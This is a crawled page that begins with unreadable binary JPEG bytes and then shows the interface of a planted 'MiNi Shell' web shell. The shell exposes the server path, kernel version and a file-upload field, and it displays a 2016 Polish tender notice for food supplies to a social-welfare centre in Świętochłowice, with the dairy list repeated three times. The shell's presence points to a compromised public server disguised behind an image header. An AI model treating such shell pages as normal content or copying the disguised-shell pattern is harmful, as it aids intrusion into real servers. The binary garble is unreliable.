JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160607/73205-N-2016.html

<p class="kh_header"><b>Świętochłowice: Dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej
 w Świętochłowicach w podziale na siedem pakietów :nabiału, drobiu, warzyw i owoców, mrożonek, ryb, jaj, pozostałych artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 73205 - 2016; data zamieszczenia: 07.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.swietochlowice.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej
 w Świętochłowicach w podziale na siedem pakietów :nabiału, drobiu, warzyw i owoców, mrożonek, ryb, jaj, pozostałych artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ - tabela artykułów w zakresie każdego z 7 pakietów. Ilości artykułów podane w tabelach
posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia,
w dni powszednie codziennie od poniedziałku do soboty w godzinach od 07:00 do 10:00. 
Wykonawca zobowiązany będzie do:
bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne,
należytego zabezpieczenia towaru na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu),
wniesienia wraz z rozładunkiem w magazynie określonym w ust. 1 niniejszego paragrafu,
i weźmie na siebie całkowitą odpowiedzialność za towar do momentu jego odbioru
 w magazynie Zamawiającego  oraz  poniesie z tego tytułu wszelkie skutki prawne.
Wykonawca zobowiązany będzie dostarczać zamawiany towar bezwzględnie w dni oraz
w godzinach wyznaczonych przez Zamawiającego.
Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, z okresami ważności
odpowiednimi dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.55.00.00-8, 15.11.20.00-6, 15.30.00.00-1, 15.11.96.00-1, 03.14.25.00-3, 15.89.60.00-5, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności faktur - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w zakresie :
- urzędowej zmiany stawki podatku VAT o różnicę wynikającą z jej dotychczasowej wielkości
a wprowadzoną zmianą,
- w przypadku zmian przepisów ogólnie obowiązujących, które mają wpływ na treść umowy, 
- w przypadku obniżenia cen producenta  lub zastosowania promocyjnej obniżki cen, Zamawiający zastrzega sobie prawo zakupu asortymentu objętego umową po cenach odpowiednio obniżonych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swietochlowice.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętochłowice, ul. Katowicka 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2016 godzina 09:00, miejsce: Świętochłowice, ul. Katowicka 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa nabiału.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Belriso - ryż na mleku 180 g
różne smaki, Zott lub równoważne 	szt.	700		
2.		Deser Jogutek   115   g
 Zott lub równoważne	szt.	800		
3.		Jogurt Jogobella 150 g - 
lub równoważne, różne smaki  oraz owocowa wyspa	szt.	2 500		
4.		Jogurt naturalny 190 g
Zott, Bakoma, Danone
lub równoważne	szt.	800		
5.		Jogurt grecki naturalny - 400 ml
Bakoma lub równoważne 	szt.	20		
6.		Deser - kaszka manna - 130 g
Smakija lub równoważne	szt.	800		
7.		Kefir - kubek 250g
Krasnystaw lub równoważne	szt.	3 000		
8.		Majonez 310 ml-
Kielecki, Winiary dekoracyjny
 lub równoważne 	szt.	200		
9.		Majonez 500 ml-
Kielecki,Winiary  lub równoważne 	szt.	100		
10.		Margaryna mleczna 250g
z Kruszwicy lub równoważne 	szt.	1 000		
11.		Margaryna 500 g -
Delma, Smakowita lub równoważne 	szt.	600		
12.		Masło Extra 200g - 82 %	szt.	5 200		
13.		Maślanka karton 1 l
Mrągowska lub równoważne 	szt.	200		
14.		Mleko 2% folia 0,9 l
Lacpol lub równoważne 	szt.	12 500		
15.		Mleko 2% karton 1 l
Łaciate, Łowickie lub równoważne 	szt.	1 500		
16.		Mleko zagęszczone niesłodzone  500 g, -Gostyń lub równoważne 	szt.	30		
17.		Mleko w proszku 0,5 kg
Łaciate, Mlekovita lub równoważne 	szt.	  5 		
18.		Ser biały półtłusty - wiaderka 1 kg, Łowicki, Krasnystaw lub równoważne 	
szt.	200		
19.		Ser biały półtłusty -
Piątnica, Figard lub równoważne 	kg	900		
20.		Ser domowy z kminkiem 	kg	150		
21.		Ser camembert 120 g
Turek, Preisident lub równoważne 	szt.	1 000		
22.		Ser feta sałatkowy 270 g 
Mlekovita, Piątnica lub równoważne 	szt.	200		
23.		Ser mascarpone  500 g	szt.	30		
24.		Serek Bakuś- różne smaki 150 g  Danio lub równoważne	szt.	700		
25.		Ser biały w kubku - 140 g
Turek, Mlekpol lub równoważne 	szt.	600		
26.		Serek topiony w plastrach - 150 g
Hochland lub równoważne 	szt.	600		
27.		Serki topione 50 g - różne smaki 	szt.	6 000		
28.		Ser żółty - Gouda, Podlaski, Morski  lub równoważne	kg	500		
29.		Ser żółty wędzony - różne	kg	15		
30.		Ser żółty w plastrach - 150 g
Edamski, Gouda lub równoważne 	szt.	1 200		
31.		Śmietana 12% - kubek 0,2  l
Krasnystaw, Piątnica lub równoważne 	szt.	500		
32.		Śmietana 36% - karton 500 g
Łowicka lub równoważne 	szt.	30		
33.		Śmietana 30 % - folia 0,25 l	szt.	1 040		
34.		Śmietanki jednorazowe 10 g x10 
Zott lub równoważne 	op.	400		
	RAZEM	

1.		Belriso - ryż na mleku 180 g
różne smaki, Zott lub równoważne 	szt.	700		
2.		Deser Jogutek   115   g
 Zott lub równoważne	szt.	800		
3.		Jogurt Jogobella 150 g - 
lub równoważne, różne smaki  oraz owocowa wyspa	szt.	2 500		
4.		Jogurt naturalny 190 g
Zott, Bakoma, Danone
lub równoważne	szt.	800		
5.		Jogurt grecki naturalny - 400 ml
Bakoma lub równoważne 	szt.	20		
6.		Deser - kaszka manna - 130 g
Smakija lub równoważne	szt.	800		
7.		Kefir - kubek 250g
Krasnystaw lub równoważne	szt.	3 000		
8.		Majonez 310 ml-
Kielecki, Winiary dekoracyjny
 lub równoważne 	szt.	200		
9.		Majonez 500 ml-
Kielecki,Winiary  lub równoważne 	szt.	100		
10.		Margaryna mleczna 250g
z Kruszwicy lub równoważne 	szt.	1 000		
11.		Margaryna 500 g -
Delma, Smakowita lub równoważne 	szt.	600		
12.		Masło Extra 200g - 82 %	szt.	5 200		
13.		Maślanka karton 1 l
Mrągowska lub równoważne 	szt.	200		
14.		Mleko 2% folia 0,9 l
Lacpol lub równoważne 	szt.	12 500		
15.		Mleko 2% karton 1 l
Łaciate, Łowickie lub równoważne 	szt.	1 500		
16.		Mleko zagęszczone niesłodzone  500 g, -Gostyń lub równoważne 	szt.	30		
17.		Mleko w proszku 0,5 kg
Łaciate, Mlekovita lub równoważne 	szt.	  5 		
18.		Ser biały półtłusty - wiaderka 1 kg, Łowicki, Krasnystaw lub równoważne 	
szt.	200		
19.		Ser biały półtłusty -
Piątnica, Figard lub równoważne 	kg	900		
20.		Ser domowy z kminkiem 	kg	150		
21.		Ser camembert 120 g
Turek, Preisident lub równoważne 	szt.	1 000		
22.		Ser feta sałatkowy 270 g 
Mlekovita, Piątnica lub równoważne 	szt.	200		
23.		Ser mascarpone  500 g	szt.	30		
24.		Serek Bakuś- różne smaki 150 g  Danio lub równoważne	szt.	700		
25.		Ser biały w kubku - 140 g
Turek, Mlekpol lub równoważne 	szt.	600		
26.		Serek topiony w plastrach - 150 g
Hochland lub równoważne 	szt.	600		
27.		Serki topione 50 g - różne smaki 	szt.	6 000		
28.		Ser żółty - Gouda, Podlaski, Morski  lub równoważne	kg	500		
29.		Ser żółty wędzony - różne	kg	15		
30.		Ser żółty w plastrach - 150 g
Edamski, Gouda lub równoważne 	szt.	1 200		
31.		Śmietana 12% - kubek 0,2  l
Krasnystaw, Piątnica lub równoważne 	szt.	500		
32.		Śmietana 36% - karton 500 g
Łowicka lub równoważne 	szt.	30		
33.		Śmietana 30 % - folia 0,25 l	szt.	1 040		
34.		Śmietanki jednorazowe 10 g x10 
Zott lub równoważne 	op.	400		
	RAZEM	

1.		Belriso - ryż na mleku 180 g
różne smaki, Zott lub równoważne 	szt.	700		
2.		Deser Jogutek   115   g
 Zott lub równoważne	szt.	800		
3.		Jogurt Jogobella 150 g - 
lub równoważne, różne smaki  oraz owocowa wyspa	szt.	2 500		
4.		Jogurt naturalny 190 g
Zott, Bakoma, Danone
lub równoważne	szt.	800		
5.		Jogurt grecki naturalny - 400 ml
Bakoma lub równoważne 	szt.	20		
6.		Deser - kaszka manna - 130 g
Smakija lub równoważne	szt.	800		
7.		Kefir - kubek 250g
Krasnystaw lub równoważne	szt.	3 000		
8.		Majonez 310 ml-
Kielecki, Winiary dekoracyjny
 lub równoważne 	szt.	200		
9.		Majonez 500 ml-
Kielecki,Winiary  lub równoważne 	szt.	100		
10.		Margaryna mleczna 250g
z Kruszwicy lub równoważne 	szt.	1 000		
11.		Margaryna 500 g -
Delma, Smakowita lub równoważne 	szt.	600		
12.		Masło Extra 200g - 82 %	szt.	5 200		
13.		Maślanka karton 1 l
Mrągowska lub równoważne 	szt.	200		
14.		Mleko 2% folia 0,9 l
Lacpol lub równoważne 	szt.	12 500		
15.		Mleko 2% karton 1 l
Łaciate, Łowickie lub równoważne 	szt.	1 500		
16.		Mleko zagęszczone niesłodzone  500 g, -Gostyń lub równoważne 	szt.	30		
17.		Mleko w proszku 0,5 kg
Łaciate, Mlekovita lub równoważne 	szt.	  5 		
18.		Ser biały półtłusty - wiaderka 1 kg, Łowicki, Krasnystaw lub równoważne 	
szt.	200		
19.		Ser biały półtłusty -
Piątnica, Figard lub równoważne 	kg	900		
20.		Ser domowy z kminkiem 	kg	150		
21.		Ser camembert 120 g
Turek, Preisident lub równoważne 	szt.	1 000		
22.		Ser feta sałatkowy 270 g 
Mlekovita, Piątnica lub równoważne 	szt.	200		
23.		Ser mascarpone  500 g	szt.	30		
24.		Serek Bakuś- różne smaki 150 g  Danio lub równoważne	szt.	700		
25.		Ser biały w kubku - 140 g
Turek, Mlekpol lub równoważne 	szt.	600		
26.		Serek topiony w plastrach - 150 g
Hochland lub równoważne 	szt.	600		
27.		Serki topione 50 g - różne smaki 	szt.	6 000		
28.		Ser żółty - Gouda, Podlaski, Morski  lub równoważne	kg	500		
29.		Ser żółty wędzony - różne	kg	15		
30.		Ser żółty w plastrach - 150 g
Edamski, Gouda lub równoważne 	szt.	1 200		
31.		Śmietana 12% - kubek 0,2  l
Krasnystaw, Piątnica lub równoważne 	szt.	500		
32.		Śmietana 36% - karton 500 g
Łowicka lub równoważne 	szt.	30		
33.		Śmietana 30 % - folia 0,25 l	szt.	1 040		
34.		Śmietanki jednorazowe 10 g x10 
Zott lub równoważne 	op.	400		
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.55.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatnosci faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa drobiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ćwiartka z kurczaka ( udka)	kg	430
Filet z indyka	kg	 10
Filet z kurczaka	kg	260
Gulasz drobiowy	kg	120
Gulasz z indyka	kg	280
Kurczak świeży	kg	800
Pałki z kurczaka 	kg	270
Porcje rosołowe z kurczaka	kg	150
Serca	kg	40
Udziec z indyka	kg	40
Wątróbka drobiowa 
z kurczaka	kg	170
Żołądki	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Botwinka 
( min. 3 sztuki w pęczku)	pęczek	20		
2.	Brzoskwinia 	kg	50		
3.	Burak czerwony	kg	      1 000		
4.	Cebula	kg	700		
5.	Czosnek	kg	80		
6.	Jabłko	kg	500		
7.	Kalafior świeży (nie mniejszy niż 15 cm średnicy)	szt.	300		
8.	Kalarepa
( min. 3 sztuki w pęczku)	pęczek	250		
9.	Kapusta biała	kg	       2 000		
10.	Kapusta czerwona	kg	500		
11.	Kapusta pekińska	szt.	250		
12.	Kapusta włoska	kg	150		
13.	Koperek zielony	pęczek	1 000		
14.	Marchew	kg	1 000		
15.	Nektarynka	kg	20		
16.	Ogórek zielony	kg	200		
17.	Papryka czerwona	kg	40		
18.	Papryka żółta	kg	5		
19	Papryka zielona	kg	5		
20	Pieczarka	kg	500		
21	Pietruszka korzeń	kg	60		
22	Pietruszka zielona	pęczek	750		
23	Pomidory	kg	300		
24	Pomidorki koktajlowe 	kg 	5		
25	Por	kg	 20		
26	Rzepa biała	kg	 2		
27	Rzodkiewka	pęczek	50		
28	Sałata zielona	szt.	300		
29	Seler korzeń	kg	100		
30	Szczypiorek	pęczek	100		
31	Szpinak świeży	kg	 20		
32	Śliwka	kg	20		
33	Winogrona białe	kg	50		
34	Truskawka	kg	 50		
35	Ziemniak nowy 
( od 01 czerwca-31 lipca) 	kg	3 600		
36	Ziemniak stary 
( od 01 grudnia- 31 maja)	kg	10 000		
 37	Ziemniak nowy ( od 1 lipca do 30 listopada - nie mniejszy niż o średnicy
 5-6 cm) 	kg	6 400		
38	Ananas	szt	10		
39	Banan	kg	100		
40	Cytryna	kg	10		
41	Grejfrut	kg	5		
42	Kapusta kiszona	kg	1 000		
